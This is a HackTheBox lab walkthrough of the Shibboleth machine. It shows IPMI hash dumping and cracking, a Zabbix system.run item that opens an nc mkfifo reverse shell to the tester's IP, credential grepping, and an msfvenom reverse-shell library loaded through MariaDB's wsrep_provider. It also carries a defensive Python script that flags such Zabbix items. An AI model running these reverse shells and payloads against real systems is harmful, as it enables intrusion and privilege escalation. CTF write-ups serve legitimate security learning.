Hack_The_Box_Writeups

HackTheBox – Shibboleth Walkthrough – In English

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.124

┌──(rootkali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.124

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -u http://shibboleth.htb/FUZZ -t 100 -sf -e php,txt,html,js -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -ic -c

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -u http://shibboleth.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -H "Host: FUZZ.shibboleth.htb" -fc 302

┌──(rootkali)-[/home/kali/Downloads]

└─# echo "10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb" | sudo tee -a /etc/hosts

http://zabbix.shibboleth.htb/

This was the Zabbix login page. A quick Google search showed that the default credentials are Admin:zabbix.

But these credentials did not work.

Finally, after spending a lot of time on port 80, I ran a UDP scan, which found one open port: 623.

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -sU -sC -sV shibboleth.htb -T4

It looks like port 623/UDP is IPMI, a protocol used for out-of-band management of embedded devices and servers. I had never heard of it before, so I looked for exploits!

msf6 > use auxiliary/scanner/ipmi/ipmi_cipher_zero

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

msf6 > use auxiliary/scanner/ipmi/ipmi_version

msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

Hash:

Administrator:02fb08888201000033e2f01b8b8b8d0b1616ff5ea39d8db4c975925effd3d2a2eeb9b3cf483e1f91a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:440767ae6339a2523a033995b3fe41128cb0321b

┌──(rootkali)-[/home/kali/Downloads]

└─# hashcat -m 7300 hash.txt /home/kali/Downloads/rockyou.txt

Username: Administrator

Password: ilovepumkinpie1

Navigate to Configuration → Hosts and you will see the host listed. Each host has several tabs, such as Triggers, Items, Web, etc. We are interested in the Items tab.

Click on Items → click on "Create item".

Key: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 1234 >/tmp/f,nowait]

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -nlvp 1234

With the nc listener running, click on the "Test" button → "Get value" and we have a shell.
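A defender-side check for the technique above (an added example, not code from the original writeup): it parses Zabbix item keys and reports every system.run item, recording whether it runs detached (nowait) and which shell indicators its command contains, so remote-command items can be audited. The sample items and the indicator list are constructed for this example.

```python
import re
# Constructed sample of Zabbix item definitions (name, key). The first key is
# the reverse-shell item from the walkthrough; the others are benign.
SAMPLE_ITEMS = [
    ("Agent check", "system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
                    "|nc 10.10.14.102 1234 >/tmp/f,nowait]"),
    ("Uptime", "system.run[uptime]"),
    ("Root free", "vfs.fs.size[/,free]"),
    ("Log tail", 'log[/var/log/syslog,"error, warning"]'),
]
# Tokens that rarely belong in a legitimate monitoring command (assumed list).
SHELL_INDICATORS = ("mkfifo", "/bin/sh", "bash -i", "nc ", "ncat", "/dev/tcp/", "|", ";")

def parse_item_key(key):
    """Split a Zabbix item key into (name, [params]); commas inside double
    quotes or nested brackets do not separate parameters."""
    m = re.fullmatch(r"([A-Za-z0-9._-]+)(?:\[(.*)\])?", key.strip(), re.S)
    if not m:
        raise ValueError(f"not a valid item key: {key!r}")
    name, raw = m.group(1), m.group(2)
    if raw is None:
        return name, []
    params, buf, depth, quoted = [], "", 0, False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch in "[]":
            depth += 1 if ch == "[" else -1
        elif not quoted and depth == 0 and ch == ",":
            params.append(buf.strip())
            buf = ""
            continue
        buf += ch
    params.append(buf.strip())
    return name, params

def find_remote_command_items(items):
    """Return one dict per system.run item: the command, whether it runs
    detached (nowait, as the reverse shell does) and any shell indicators."""
    findings = []
    for name, key in items:
        key_name, params = parse_item_key(key)
        if key_name != "system.run" or not params:
            continue
        cmd = params[0].strip('"')
        mode = params[1].strip('"') if len(params) > 1 else "wait"
        findings.append({"name": name, "command": cmd, "nowait": mode == "nowait",
                         "indicators": [t for t in SHELL_INDICATORS if t in cmd]})
    return findings
```

Run it against an export of your items table and review every finding; a monitoring command that needs mkfifo or a named pipe is not monitoring.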

$ cat /etc/passwd

$ cd /home

$ ls

$ cd ipmi-svc

$ ls

$ cat user.txt

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc

ipmi-svc@shibboleth:/etc/zabbix$ netstat -antp

Once we have the user flag and the user account, I see that MySQL is running and start grepping for passwords. I find one in the /etc/zabbix directory.

ipmi-svc@shibboleth:~$ grep -iR 'password' /etc/zabbix/ 2>/dev/null

DBPassword=bloooarskybluh

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix

Enter password: bloooarskybluh

┌──(rootkali)-[/home/kali/Downloads]

└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.102 LPORT=4001 -f elf-so -o test.so

┌──(rootkali)-[/home/kali/Downloads]

└─# python -m http.server 80

MariaDB [zabbix]> quit

ipmi-svc@shibboleth:/etc/zabbix$ cd /tmp

ipmi-svc@shibboleth:/tmp$ wget http://10.10.14.102/test.so

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix

Enter password: bloooarskybluh

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 4001

MariaDB [zabbix]> SET GLOBAL wsrep_provider="/tmp/test.so";

Hi, I’m saksham dixit
